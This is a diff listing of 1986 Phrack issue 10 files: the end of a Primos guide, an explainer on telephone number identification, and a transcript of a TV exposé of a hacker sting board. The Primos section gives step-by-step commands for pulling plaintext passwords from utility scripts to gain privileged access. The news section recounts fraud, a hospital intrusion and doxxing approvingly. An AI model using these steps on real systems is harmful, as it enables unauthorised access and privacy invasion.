|
||||
CAN be hacked. Most hackers tend to stay away from Primes, little knowing that
|
||||
Primos is a system that is very entertaining and certainly kept me up late
|
||||
hours of the night. Have fun and keep on hacking. If you have any questions or
|
||||
comments, or I have made some sort of error, by all means get in touch with me
|
||||
at whatever system you have seen me on...
|
||||
|
||||
|
||||
** Now For The Good Shit **
|
||||
|
||||
This part was originally going to be a beginners introduction to commands on a
|
||||
Primos system. Instead I decided to write a part which should help ANYONE with
|
||||
a low level account gain system access. I would also like to thank PHRACK Inc.
|
||||
on the wonderful job they are doing...without PHRACK I don't really know for
|
||||
sure how I would have distributed my files. Oh yes, I know of all the other
|
||||
newsletters and the like, but with PHRACK it was only a matter of getting a
|
||||
hold of one of the people in charge, which is a simple matter since their
|
||||
mailbox number is widely known to the hack/phreak community. I would also like
|
||||
to encourage boards of this nature to support PHRACK fully, and I would also
|
||||
like to congratulate you guys, once again, for the great job your doing. Now,
|
||||
on with the file.
|
||||
|
||||
|
||||
|
||||
** Stuff You Should Know **
|
||||
|
||||
The explanation I am going to (try to) explain will NOT work all the time...
|
||||
probably 60% of the time. Since I discovered this, or at least was the first
|
||||
to put it in "print" I would at least ask those system operators out there to
|
||||
keep my credits and the credits of my group in this file.
|
||||
|
||||
|
||||
** Some More Stuff **
|
||||
|
||||
First, this is not exactly a "novice"-friendly file. You should be familiar
|
||||
with the ATTACH and SLIST commands before proceeding. They are quite easy to
|
||||
learn, and it is really not required to use this file, but just the same,
|
||||
these are important commands in learning the Primos system so you should at
|
||||
least be familiar with them. To get help on them type:
|
||||
|
||||
HELP SLIST
|
||||
|
||||
or
|
||||
|
||||
HELP ATTACH
|
||||
|
||||
You should also play with the commands until you know all of their uses.
|
||||
|
||||
|
||||
** Okay, Here We Go **
|
||||
|
||||
This file is not going to explain everything I do. I'm just going to show you
|
||||
how to get SYS1 privileged accounts.
|
||||
|
||||
|
||||
First, log on to your low access account.
|
||||
|
||||
Type:
|
||||
|
||||
ATTACH MFD
|
||||
|
||||
Then get a DIR using:
|
||||
|
||||
LD
|
||||
|
||||
Okay, your now seeing a dir with a lot of sub-directories. The only files that
|
||||
should be in the main directory (most of the time) are BOOT and SYS1. Ignore
|
||||
these...look for a file called CCUTIL or something with the word UTILITY or
|
||||
UTIL or UTILITIES...something that looks like UTILITY...
|
||||
|
||||
|
||||
Okay, ATTACH to that directory with:
|
||||
|
||||
ATTACH <NAME OF DIRECTORY>
|
||||
|
||||
Now, do an LD again and look at the files. Now, here is the part that is
|
||||
really random. Since not every PRIME system will have the same UTILITY
|
||||
programs, just look at any that have an extension ".CPL". There might be one
|
||||
called USRLST.CPL. Type:
|
||||
|
||||
|
||||
SLIST USRLST <NO NEED TO TYPE ".CPL" AT THE END.>
|
||||
|
||||
|
||||
Okay, it should be printing a whole bunch of bullshit. Now in this program
|
||||
there SHOULD be a line that looks like the following:
|
||||
|
||||
|
||||
A CCUTIL X
|
||||
|
||||
|
||||
Now, CCUTIL is the name of the dir you are on so I have to point out that
|
||||
CCUTIL WILL NOT ALWAYS BE THE NAME OF THAT UTILITY DIRECTORY. So if the name
|
||||
of the UTILITY directory you are on is called UTILITY then the line will look
|
||||
like this:
|
||||
|
||||
|
||||
A UTILITY X
|
||||
|
||||
|
||||
Now, the X is the PASSWORD OF THAT DIRECTORY. AGAIN, IT CAN BE ANYTHING. The
|
||||
password may be UTILITY which means it will look like this:
|
||||
|
||||
|
||||
A UTILITY UTILITY
|
||||
|
||||
|
||||
Or the password may be SECRET. So:
|
||||
|
||||
|
||||
A UTILITY SECRET
|
||||
|
||||
|
||||
Pat yourself on the ass...you know have SYS1 access. Log back in with the
|
||||
LOGIN command (or if it doesn't work just LOGOUT and LOGIN again). Enter
|
||||
UTILITY or CCUTIL (or WHATEVER THE NAME OF THE DIRECTORY WAS) as the user id.
|
||||
Then for the password just enter the password. If this doesn't work, then what
|
||||
you will have to do is try out other sub-directories from the MFD directory.
|
||||
Then SLIST other programs with the extension. In one of my other PRIME files I
|
||||
will fully explain what I have just done and other ways to get the
|
||||
directories/ids password.
|
||||
|
||||
|
||||
Now, if you don't see any line in the program like:
|
||||
|
||||
|
||||
S <NAME OF DIR> <PASSWORD>
|
||||
|
||||
|
||||
Then list other programs in the utility program or try other directories. I
|
||||
have gained SYS1 access like this 60% of them time. And NOT ALWAYS ON THE
|
||||
UTILITY DIRECTORY.
|
||||
|
||||
|
||||
That is about it for this file. Stay tuned for a future PHRACK issue with
|
||||
another PRIME file from me. If I don't change my mind again, the next file
|
||||
will deal with basic commands for beginners.
|
||||
|
||||
|
||||
|
||||
-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-
|
||||
! !
|
||||
# This Has Been An: #
|
||||
! !
|
||||
# Evil Jay Presentation #
|
||||
! !
|
||||
# Phone Phreaks of America #
|
||||
! !
|
||||
# (C) 1986-87 #
|
||||
! !
|
||||
-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-
|
170
phrack10/7.txt
Normal file
170
phrack10/7.txt
Normal file
|
@ -0,0 +1,170 @@
|
|||
==Phrack Inc.==
|
||||
|
||||
Volume Two, Issue Ten, Phile #7 of 9
|
||||
|
||||
Automatic Number Idenfification
|
||||
|
||||
|
||||
Written by Doom Prophet and Phantom Phreaker
|
||||
|
||||
|
||||
Automatic Number Identification (ANI) is nothing more than automatic means
|
||||
for immediately identifying the Directory Number of a calling subscriber. This
|
||||
process made it possible to utilize CAMA* (Centralized Automatic Message
|
||||
Accounting) systems in SxS, Panel, and Xbar #1 offices.
|
||||
|
||||
The identity of the calling line is determined by ANI circuits installed
|
||||
in the types of CO's mentioned above. Xbar#5 offices have their own AMA
|
||||
(Automatic Message Accounting) equipment and utilize an AMA translator for
|
||||
automatically identifying the calling line.
|
||||
|
||||
Before ANI was developed, each subscriber line (also called a local loop)
|
||||
had a mechanical marking device that kept track of toll charges. These devices
|
||||
were manually photographed at the end of the billing period and the amount of
|
||||
the subscribers bill was determined from that. This process was time
|
||||
consuming, so a new system (ANI) was developed.
|
||||
|
||||
The major components of the ANI system used in SxS and Crossbar #1 are:
|
||||
|
||||
Directory number network and bus arrangement* for connecting the sleeve(the
|
||||
lead that is added to the R(ing) and T(ip) wires of a cable pair at the MDF*
|
||||
(Main Distribution Frame));
|
||||
|
||||
A lead of each line number through an identifier connector to the identifier
|
||||
circuit;
|
||||
|
||||
Outpulser and Identifier connector circuit to seize an idle Identifier;
|
||||
|
||||
Identifier circuit to ascertain the calling party's number and send it to the
|
||||
outpulser for subsequent transmission through the outpulser link to the ANI
|
||||
outgoing trunk;
|
||||
|
||||
An ANI outgoing trunk to a Tandem office equipped with a CAMA system.
|
||||
|
||||
The following is a synopsis of the ANI operations with respect to a toll
|
||||
call through a #1Xbar office. The call is handled in the normal manner by the
|
||||
CO equipment and is routed through an ANI outgoing trunk to a Tandem office.
|
||||
The identification process starts as soon as all digits of the called number
|
||||
are received by the CAMA sender in the Tandem office and when the district
|
||||
junctor in the Xbar office advances to its cut-through position (a position of
|
||||
the connecting circuits or paths between the line-link and trunk-link frames
|
||||
in the CO).
|
||||
|
||||
Upon receiving the start identification signal from the CAMA equipment,
|
||||
the ANI outgoing trunk (OGT) establishes a connection through an outpulser
|
||||
link to an idle outpulser circuit. An idle identifier is then seized by the
|
||||
outpulser circuit through an internal Identifier connector unit. Then the
|
||||
identifier through the connector unit connects to the directory number network
|
||||
and bus system.
|
||||
|
||||
At the same time, the identifier will signal the ANI trunk to apply a
|
||||
5800Hz identification tone to the sleeve lead of the ANI trunk. The tone is
|
||||
transmitted at a two-volt level over the S lead paths through the directory
|
||||
number network and bus system. It will be attenuated or decreased to the
|
||||
microvolt range by the time the identifier circuit is reached, necessitating
|
||||
a 120dB voltage amplification by the amplifier detector equipment in the
|
||||
identifier to insure proper digit identification and registration operations.
|
||||
|
||||
A single ANI installation can serve as many as six CO's in a multi-office
|
||||
building. The identifier starts its search for the calling line number by
|
||||
testing or scanning successively the thousands secondary buses of each CO.
|
||||
When the 5800Hz signal is detected, the identifier grounds corresponding leads
|
||||
to the outpulser, to first register the digit of the calling office and then
|
||||
the thousands digit of the calling subscriber's number. The outpulser
|
||||
immediately translates the digit representing the calling office code into its
|
||||
own corresponding three digit office code. The identifier continues its
|
||||
scanning process successively on the groups of hundreds, tens, and units
|
||||
secondary buses in the calling office, and the identified digits of the
|
||||
calling number are also registered and translated in the outpulser's relay
|
||||
equipment for transmission to the tandem office.
|
||||
The outpulser is equipped with checking and timing features to promptly detect
|
||||
and record troubles encountered (This process may be responsible for some of
|
||||
the cards found while trashing). Upon completion of the scanning process, it
|
||||
releases the identifier and proceeds to outpulse in MF tones the complete
|
||||
calling subscriber's number to the CAMA equipment in the tandem office in the
|
||||
format of KP+X+PRE+SUFF+ST where the X is an information digit. The
|
||||
information digits are as follows:
|
||||
|
||||
0-Automatic Identification (normal) 1-Operator Identification (ONI)*
|
||||
2-Identification Failure (ANIF)*
|
||||
|
||||
(There is also other types of outpulsing of ANI information if the calling
|
||||
line has some sort of restriction on it).
|
||||
|
||||
When all digits have been transmitted and the ANI trunk is cut-through for
|
||||
talking, the outpulser releases.
|
||||
|
||||
In the tandem office, the calling party's number is recorded on tape in
|
||||
the CAMA equipment together with other data required for billing purposes.
|
||||
This information, including the time of when the called station answered and
|
||||
the time of disconnect, goes on AMA tapes.
|
||||
The tapes themselves are usually standard reel to reel magnetic tape, and are
|
||||
sent to the Revenue Accounting Office or RAO at the end of the billing period.
|
||||
|
||||
So, to sum the entire ANI process up:
|
||||
|
||||
The toll call is made. The CO routes the call through ANI trunks where an idle
|
||||
identifier is seized which then connects to the directory number network and
|
||||
bus system while signalling the ANI trunk to apply the needed 5800Hz tone to
|
||||
the Sleeve. The identifier begins a scanning process and determines the
|
||||
calling office number and the digits of the calling subscriber's number, which
|
||||
is sent by way of the outpulser in MF tones to the CAMA equipment in the
|
||||
tandem office. The call information is recorded onto AMA tapes and used to
|
||||
determine billing.
|
||||
|
||||
Note that your number does show up on the AMA tape, if the circumstances
|
||||
are correct, (any toll call, whether it is from a message-rate line or from a
|
||||
flat-rate line). However, the AMA tapes do not record the calling line number
|
||||
in any separated format. They are recorded on a first-come, first-serve basis.
|
||||
|
||||
|
||||
Misc. Footnotes (denoted by an asterisk in the main article)
|
||||
---------------
|
||||
|
||||
* ANIF-Automatic Number Identification Failure. This is when the ANI equipment
|
||||
does not work properly, and could occur due to a wide variety of technical-
|
||||
ities. When ANIF occurs, something called ONI (Operator Number Identification)
|
||||
is used. The call is forwarded to a TSPS operator who requests the calling
|
||||
line number by saying something similar to 'What number are you calling from?'
|
||||
|
||||
* CAMA-Centralized Automatic Message Accounting. CAMA is a system that records
|
||||
call details for billing purposes. CAMA is used from a centralized location,
|
||||
usually a Tandem office. CAMA is usually used to serve class 5 End Offices in
|
||||
a rural area near a large city which contains a Tandem or Toll Office. CAMA is
|
||||
similar to LAMA, except LAMA is localized in a specific CO and CAMA is not.
|
||||
|
||||
* The Directory Number Network and bus system is a network involved with the
|
||||
ANI process. It is a grid of vertical and horizontal buses, grouped and class-
|
||||
ified as Primary or Secondary. There are 100 vertical and 100 horizontal buses
|
||||
in the Primary system. In the Secondary system, there are two sub-groups:Bus
|
||||
system #1 and Bus system #2, both of which have ten horizontal and vertical
|
||||
buses. These buses as a whole are linked to the Identifier in the ANI trunk
|
||||
and are responsible for identifying tens, hundreds, thousands and units digits
|
||||
of the calling number (After the Identifier begins its scanning process).
|
||||
|
||||
* MDF-Main Distribution Frame. This is the area where all cable pairs of a
|
||||
certain office meet, and a third wire, the Sleeve wire, is added. The Sleeve
|
||||
wire is what is used in gathering ANI information, as well as determining a
|
||||
called lines status (off/on hook) in certain switching systems by presence of
|
||||
voltage. (voltage present on Sleeve, line is busy, no voltage, line is idle.)
|
||||
|
||||
* ONI-Operator Number Identification. See ANIF footnote.
|
||||
|
||||
NOTE: There are also other forms of Automatic Message Accounting, such as LAMA
|
||||
(Local Automatic Message Accounting). LAMA is used in the class 5 End Office
|
||||
as opposed to CAMA in a Toll Office. If your End Office had LAMA, then the ANI
|
||||
information would be recorded at the local level and sent from there. The LAMA
|
||||
arrangement may be computerized, in which it would denoted with a C included
|
||||
(LAMA-C or C-LAMA).
|
||||
|
||||
|
||||
References and acknowledgements
|
||||
-------------------------------
|
||||
Basic Telephone Switching Systems (Second Edition) by David Talley
|
||||
Understanding Telephone Electronics by Radio Shack/Texas Instruments
|
||||
|
||||
Other sysops are allowed to use this file on their systems as long as none of
|
||||
it is altered in any way.
|
||||
|
||||
-End of file-
|
||||
Jul 12 1986
|
392
phrack10/8.txt
Normal file
392
phrack10/8.txt
Normal file
|
@ -0,0 +1,392 @@
|
|||
==Phrack Inc.==
|
||||
|
||||
Volume Two, Issue Ten, Phile #8 of 9
|
||||
|
||||
PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
|
||||
PWN PWN
|
||||
PWN <-=*} Phrack World News {*=-> PWN
|
||||
PWN PWN
|
||||
PWN Issue IX/Part One PWN
|
||||
PWN PWN
|
||||
PWN Compiled, Written, and Edited by PWN
|
||||
PWN PWN
|
||||
PWN Knight Lightning PWN
|
||||
PWN PWN
|
||||
PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
|
||||
|
||||
In PWN Issue Seven/Part One, we had an article entitled "Maxfield Strikes
|
||||
Again." It was about a system known as "THE BOARD" in the Detroit 313 NPA.
|
||||
The number was 313-592-4143 and the newuser password was "HEL-N555,ELITE,3"
|
||||
(then return). It was kind of unique because it was run off of an HP2000
|
||||
computer. On August 20, 1986 the following message was seen on "THE BOARD."
|
||||
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
||||
Welcome to MIKE WENDLAND'S I-TEAM sting board!
|
||||
(Computer Services Provided By BOARDSCAN)
|
||||
66 Megabytes Strong
|
||||
|
||||
300/1200 baud - 24 hours.
|
||||
|
||||
Three (3) lines = no busy signals!
|
||||
Rotary hunting on 313-534-0400.
|
||||
|
||||
|
||||
Board: General Information & BBS's
|
||||
Message: 41
|
||||
Title: YOU'VE BEEN HAD!!!
|
||||
To: ALL
|
||||
From: HIGH TECH
|
||||
Posted: 8/20/86 @ 12.08 hours
|
||||
|
||||
Greetings:
|
||||
|
||||
You are now on THE BOARD, a "sting" BBS operated by MIKE WENDLAND of the
|
||||
WDIV-TV I-Team. The purpose? To demonstrate and document the extent of
|
||||
criminal and potentially illegal hacking and telephone fraud activity by the
|
||||
so-called "hacking community."
|
||||
|
||||
Thanks for your cooperation. In the past month and a half, we've received all
|
||||
sorts of information from you implicating many of you to credit card fraud,
|
||||
telephone billing fraud, vandalism, and possible break-ins to government or
|
||||
public safety computers. And the beauty of this is we have your posts, your
|
||||
E-Mail and--- most importantly ---your REAL names and addresses.
|
||||
|
||||
What are we going to do with it? Stay tuned to News 4. I plan a special
|
||||
series of reports about our experiences with THE BOARD, which saw users check
|
||||
in from coast-to-coast and Canada, users ranging in age from 12 to 48. For our
|
||||
regular users, I have been known as High Tech, among other ID's. John Maxfield
|
||||
of Boardscan served as our consultant and provided the HP2000 that this "sting"
|
||||
ran on. Through call forwarding and other conveniences made possible by
|
||||
telephone technology, the BBS operated remotely here in the Detroit area.
|
||||
|
||||
When will our reports be ready? In a few weeks. We now will be contacting
|
||||
many of you directly, talking with law enforcement and security agents from
|
||||
credit card companies and the telephone services.
|
||||
|
||||
It should be a hell of a series. Thanks for your help. And don't bother
|
||||
trying any harassment. Remember, we've got YOUR real names.
|
||||
|
||||
Mike Wendland
|
||||
The I-team
|
||||
WDIV, Detroit, MI.
|
||||
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
||||
This then is the result:
|
||||
|
||||
Phrack World News proudly presents...
|
||||
|
||||
Mike Wendland & the I-Team Investigate
|
||||
"Electronic Gangsters"
|
||||
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
||||
|
||||
Carman Harlan: Well we've all heard of computer hackers, those electronic
|
||||
gangsters who try to break into other people's computer
|
||||
systems. Tonight on the first of a three part news 4 [WDIV-TV,
|
||||
Channel 4 in Detroit] extra, Mike Wendland and the I-Team will
|
||||
investigate how such computer antics jeopardize our privacy.
|
||||
Mike joins us now to tell us what at first may have been
|
||||
innocent fun may now be affecting our pocket books.
|
||||
|
||||
Mike Wendland: Well Carman and Mort, thanks to the media and movies just about
|
||||
everyone knows about hackers and phone phreaks. By hooking
|
||||
their Apples, their Ataris, and their Commodores into telephone
|
||||
lines these electronic enthusiasts have developed a new form of
|
||||
communication, the computer bulletin board. There are probably
|
||||
10,000 of these message swapping boards around the country
|
||||
today, most are innocent and worthwhile. There are an
|
||||
estimated 1,000 pirate or hacker boards where the main
|
||||
activities are electronic trespassing, and crime [Estimates
|
||||
provided by John Maxfield].
|
||||
|
||||
[Clipping From Wargames comes on]
|
||||
|
||||
In movies like Wargames computer hackers are portrayed as
|
||||
innocent hobbyist explorers acting more out of mischief than
|
||||
malice. But today a new generation of hackers have emerged. A
|
||||
hacker that uses his knowledge of computers to commit crimes.
|
||||
Hackers have electronically broken into banks, ripped off
|
||||
telephone companies for millions of dollars, trafficked in
|
||||
stolen credit card numbers, and through there network of
|
||||
computer bulletin boards traded information on everything from
|
||||
making bombs to causing terrorism.
|
||||
|
||||
[Picture of John Maxfield comes on]
|
||||
|
||||
John Maxfield: Well, now there are electronic gangsters, not just electronic
|
||||
explorers they are actually gangsters. These hackers meet
|
||||
electronically through the phone lines or computer bulletin
|
||||
boards. They don't meet face to face usually, but it is a
|
||||
semi-organized gang stile activity, much like a street gang, or
|
||||
motorcycle gang.
|
||||
|
||||
Mike Wendland: John Maxfield of Detroit is America's foremost "Hacker
|
||||
Tracker". He has worked for the F.B.I. and various other law
|
||||
enforcement and security organizations. Helping catch dozens
|
||||
of hackers around the country, who have used their computers
|
||||
for illegal purposes. To find out how widespread these
|
||||
electronic gangsters have become, we used John Maxfield as a
|
||||
consultant to setup a so-called "sting" bulletin board [THE
|
||||
BOARD].
|
||||
|
||||
We wrote and designed a special program that would allow us to
|
||||
monitor the calls we received and to carefully monitor the
|
||||
information that was being posted. We called our undercover
|
||||
operation "The Board", and put the word out on the underground
|
||||
hacker network that a new bulletin board was in operation for
|
||||
the "Elite Hacker". Then we sat back and watched the computer
|
||||
calls roll in.
|
||||
|
||||
In all we ran our so called "Sting" board for about a month and
|
||||
a half, 24 hours a day, 7 days a week. We received literally
|
||||
hundreds of phone calls from hackers coast to coast, ranging in
|
||||
age from 17 to 43. All of them though had one thing in common,
|
||||
they were looking for ways to cheat the system.
|
||||
|
||||
The hackers identified themselves by nicknames or handles like
|
||||
CB radio operators use, calling themselves things like Ax
|
||||
Murderer, Big Foot, and Captain Magic. They left messages on a
|
||||
variety of questionable subjects, this hacker for instance told
|
||||
how to confidentially eavesdrop on drug enforcement radio
|
||||
conversations. A New York hacker called The Jolter swapped
|
||||
information on making free long-distance calls through stolen
|
||||
access codes, and plenty of others offered credit card numbers
|
||||
to make illegal purchases on someone else's account.
|
||||
|
||||
John Maxfield: Well these kids trade these credit card numbers through the
|
||||
computer bulletin boards much like they'd trade baseball cards
|
||||
at school. What we've seen in the last few years is a series
|
||||
of hacker gangs that are run by an adult, sort of the
|
||||
mastermind who stays in the background and is the one who
|
||||
fences the merchandise that the kids order with the stolen
|
||||
credit cards.
|
||||
|
||||
Mike Wendland: Then there were the malicious messages that had the potential
|
||||
to do great harm. The Repo Man from West Virginia left this
|
||||
message telling hackers precisely how to break into a hospital
|
||||
computer in the Charleston, WV area.
|
||||
|
||||
[Picture of Hospital]
|
||||
|
||||
This is where that number rings, the Charleston Area Medical
|
||||
Center. We immediately notified the hospital that there
|
||||
computer security had been breached. Through a spokesperson,
|
||||
the hospital said that a hacker had indeed broken into the
|
||||
hospital's computer and had altered billing records. They
|
||||
immediately tightened security and began an investigation.
|
||||
They caught the hacker who has agreed to make restitution for
|
||||
the damages. Maxfield says though, "Most such break-ins are
|
||||
never solved".
|
||||
|
||||
John Maxfield: When you are talking about electronic computer intrusion, it's
|
||||
the perfect crime. It's all done anonymously, it's all done by
|
||||
wires, there's no foot prints, no finger prints, no blood
|
||||
stains, no smoking guns, nothing. You may not even know the
|
||||
system has been penetrated.
|
||||
|
||||
Mike Wendland: Our experience with the "Sting" bulletin board came to a sudden
|
||||
and unexpected end. Our cover was blown when the hackers
|
||||
somehow obtained confidential telephone company records. The
|
||||
result a campaign of harassment and threats that raised serious
|
||||
questions about just how private our supposedly personal
|
||||
records really are. That part of the story tomorrow. [For a
|
||||
little more detail about how their cover was "blown" see PWN
|
||||
Issue 7/Part One, "Maxfield Strikes Again." Heh heh heh heh.]
|
||||
|
||||
Mort Crim: So these aren't just kids on a lark anymore, but who are the
|
||||
hackers?
|
||||
|
||||
Mike Wendland: I'd say most of them are teenagers, our investigation has
|
||||
linked about 50 of them hardcore around this area, but most
|
||||
very young.
|
||||
|
||||
Mort Crim: Far beyond just vandalism!
|
||||
|
||||
Mike Wendland: Yep.
|
||||
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
||||
A few quicknotes in between shows, Mike Wendland and John Maxfield set up THE
|
||||
BOARD. Carman Harlan and Mort Crim are newscasters.
|
||||
|
||||
Also if anyone is interested in the stupidity of Mike Wendland, he flashed the
|
||||
post that contained the phone number to the hospital across the screen, Bad
|
||||
Subscript put the VCR on pause and got the number. If interested please
|
||||
contact Bad Subscript, Ctrl C, or myself.
|
||||
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
||||
Carman Harlan: Tonight on the second part of a news 4 [WDIV-TV, Channel 4 in
|
||||
Detroit] extra Mike Wendland and the I-Team report on how they
|
||||
setup a sting bulletin board to see how much they could get on
|
||||
these criminal hackers. Mike joins us now to explain that
|
||||
information, that was not the only thing they got.
|
||||
|
||||
Mike Wendland: That's right, Carman & Mort. Our so called sting bulletin
|
||||
board received hundreds of calls from hackers all over America,
|
||||
and even Canada. They offered to trade stolen credit cards,
|
||||
and they told how to electronically break into sensitive
|
||||
government computers. But our investigation came to a sudden
|
||||
end when our sting board was stung. Our cover was blown when
|
||||
a hacker discovered that this man, computer security expert
|
||||
John Maxfield was serving as the I-Team consultant on the
|
||||
investigation. Maxfield specializes as a hacker tracker and
|
||||
has worked for the F.B.I. and various other police and security
|
||||
agencies. The hacker discovered our sting board by getting a
|
||||
hold of Maxfield's supposedly confidential telephone records.
|
||||
|
||||
John Maxfield: And in the process of doing that he discovered the real number
|
||||
to the computer. We were using a different phone number that
|
||||
was call forwarded to the true phone number, he found that
|
||||
number out and called it to discover he was on the sting board.
|
||||
|
||||
Mike Wendland: But the hacker didn't stop at exposing the sting, instead he
|
||||
posted copies of Maxfield's private telephone bill on other
|
||||
hacker bulletin boards across the country.
|
||||
|
||||
John Maxfield: The harassment started, all of the people on my phone bill got
|
||||
calls from hackers. In some cases their phone records were
|
||||
also stolen, friends and relatives of theirs got calls from
|
||||
hackers. There was all sorts of other harassment, I got a call
|
||||
from a food service in Los Angeles asking where I wanted the
|
||||
500 pounds of pumpkins delivered. Some of these kids are
|
||||
running around with guns, several of them made threats that
|
||||
they were going to come to Detroit, shoot me and shoot Mike
|
||||
Wendland.
|
||||
|
||||
Mike Wendland: A spokesperson from Michigan Bell said that the breakdown in
|
||||
security that led to the release of Maxfield's confidential
|
||||
records was unprecedented.
|
||||
|
||||
Phil Jones (MI Bell): I think as a company were very concerned because we work
|
||||
very hard to protect the confidentially of customer's
|
||||
records. [Yeah, right].
|
||||
|
||||
Mike Wendland: The hacker who got a hold of Maxfield's confidential phone
|
||||
records is far removed from Michigan, he lives in Brooklyn, NY
|
||||
and goes by the name Little David [Bill From RNOC]. He says
|
||||
that getting confidential records from Michigan Bell or any
|
||||
other phone company is child's play. Little David is 17 years
|
||||
old. He refused to appear on camera, but did admit that he
|
||||
conned the phone company out of releasing the records by simply
|
||||
posing as Maxfield. He said that he has also sold pirated
|
||||
long-distance access codes, and confidential information
|
||||
obtained by hacking into the consumer credit files of T.R.W.
|
||||
Little David says that one of his customers is a skip-tracer, a
|
||||
private investigator from California who specializes in finding
|
||||
missing people. Maxfield, meanwhile, says that his own
|
||||
information verified Little David's claim.
|
||||
|
||||
John Maxfield: The nearest I can determine the skip-tracer was using the
|
||||
hacker, the 17 year old boy to find out the whereabouts of
|
||||
people he was paid to find. He did this by getting into the
|
||||
credit bureau records for the private eye. This is an invasion
|
||||
of privacy, but it's my understanding that this boy was getting
|
||||
paid for his services.
|
||||
|
||||
Mike Wendland: In Long Island in New York, Maxfield's telephone records were
|
||||
also posted on a bulletin board sponsored by Eric Corley,
|
||||
publisher of a hacker newsletter [2600 Magazine]. Corley
|
||||
doesn't dispute the harassment that Maxfield received.
|
||||
|
||||
Eric Corley: Any group can harass any other group, the difference with hackers
|
||||
is that they know how to use particular technology to do it. If
|
||||
you get a malevolent hacker mad at you there's no telling all the
|
||||
different things that can happen.
|
||||
|
||||
Mike Wendland: What can happen? Well besides getting your credit card number
|
||||
or charging things to your account, hackers have been known to
|
||||
change people's credit ratings. It is really serious business!
|
||||
And tomorrow night we'll hear about the hacker philosophy which
|
||||
holds that if there is information out there about you it is
|
||||
fair game.
|
||||
|
||||
Mort Crim: "1984" in 1986.
|
||||
|
||||
Mike Wendland: It is!
|
||||
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
||||
Carman Harlan: News four [WDIV-TV, Channel 4 in Detroit] extra, Mike Wendland
|
||||
and the I-Team look at how these hackers are getting out of
|
||||
hand.
|
||||
|
||||
Mike Wendland: The problem with hackers is not just with mischief anymore,
|
||||
unscrupulous hackers are not only invading your privacy, they
|
||||
are costing you money. Case and point, your telephone bills,
|
||||
because American telephone companies have long been targets of
|
||||
computer hackers and thieves we are paying more than we should.
|
||||
Experts say the long distance companies lose tens of millions
|
||||
of dollars a year to, these self described "Phone Phreaks."
|
||||
|
||||
For example in Lansing, the Michigan Association of
|
||||
Governmental Employees received a phone bill totalling nearly
|
||||
three hundred and twenty one thousand dollars. For calls
|
||||
illegally racked up on there credit card by hackers. Such
|
||||
victims seldom get stuck paying the charges, so hackers claim
|
||||
there piracy is innocent fun.
|
||||
|
||||
Phil Jones (MI Bell): Nothing could be further from the truth, it becomes a
|
||||
very costly kind of fun. What happens is that the
|
||||
majority of the customers who do pay there bills on
|
||||
time, and do use our service lawfully end up quitting
|
||||
after that bill.
|
||||
|
||||
Mike Wendland: That's not all, hackers regularly invade our privacy, they
|
||||
leave pirated credit card numbers and information how to break
|
||||
into electronic computer banks on bulletin boards. Thousands
|
||||
of such electronic message centers exist across the country,
|
||||
most operated by teenagers.
|
||||
|
||||
John Maxfield: There is no law enforcement, no parental guidance, they're just
|
||||
on their own so they can do anything they want. So the few bad
|
||||
ones that know how to steal and commit computer crimes teach
|
||||
the other ones.
|
||||
|
||||
Mike Wendland: There is very little that is safe from hackers, from automatic
|
||||
teller machines and banks to the internal telephone systems at
|
||||
the White House. Hackers have found ways around them all
|
||||
hackers even have their own underground publication of sorts
|
||||
that tells them how to do it.
|
||||
|
||||
[Close up of publication]
|
||||
|
||||
Its called 2600 [2600 Magazine], after the 2600 hertz that
|
||||
phone phreaks use to bypass telephone companies billing
|
||||
equipment. It tells you how to find credit card numbers and
|
||||
confidential records in trash bins, break into private
|
||||
mainframe computers, access airline's computers, and find
|
||||
financial information on other people through the nations
|
||||
largest credit bureau, TRW. 2600 is published in a
|
||||
ram-shackled old house at the far end of Long Island, New York
|
||||
by this man, Eric Corley. He argues that hackers aren't
|
||||
electronic gangsters.
|
||||
|
||||
Eric Corley: We like to call them freedom fighters. Hackers are the true
|
||||
individuals of the computer revolution, they go were people tell
|
||||
them not to go, they find out things they weren't supposed to
|
||||
find out.
|
||||
|
||||
Mike Wendland: Corley's newsletter supports a hacker bulletin board called the
|
||||
Private Sector. Last year the F.B.I. raided it.
|
||||
|
||||
Eric Corley: They managed to charge the system operator with illegal
|
||||
possession of a burglary tool in the form of a computer program.
|
||||
|
||||
Mike Wendland: But the bulletin board is still in operation. Corley resents
|
||||
the suspicion that hackers are involved in criminal activities.
|
||||
|
||||
Eric Corley: Hackers are not the people who go around looking for credit cards
|
||||
and stealing merchandise. That's common thievery. Hackers are
|
||||
the people who explore. So basically what we are saying is more
|
||||
knowledge for more people. That will make it better for
|
||||
everybody.
|
||||
|
||||
Mike Wendland: He claims that hackers, in their own ways, really protect our
|
||||
rights by exposing our vulnerabilities. Well hackers may
|
||||
expose our vulnerabilities, but they also invade our privacy.
|
||||
There activities have really spotlighted the whole question of
|
||||
privacy raised by the massive files that are now out there in
|
||||
electronic data banks. Much of that information that we think
|
||||
is personal and confidential is often available to the whole
|
||||
world.
|
||||
|
||||
|
||||
|
||||
Original transcript gathered and typed by
|
||||
|
||||
Ctrl C & Bad Subscript
|
||||
|
||||
Major editing by Knight Lightning
|
||||
_______________________________________________________________________________
|
298
phrack10/9.txt
Normal file
298
phrack10/9.txt
Normal file
|
@ -0,0 +1,298 @@
|
|||
==Phrack Inc.==
|
||||
|
||||
Volume Two, Issue Ten, Phile #9 of 9
|
||||
|
||||
PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
|
||||
PWN PWN
|
||||
PWN <-=*} Phrack World News {*=-> PWN
|
||||
PWN PWN
|
||||
PWN Issue IX/Part Two PWN
|
||||
PWN PWN
|
||||
PWN Compiled, Written, and Edited by PWN
|
||||
PWN PWN
|
||||
PWN Knight Lightning PWN
|
||||
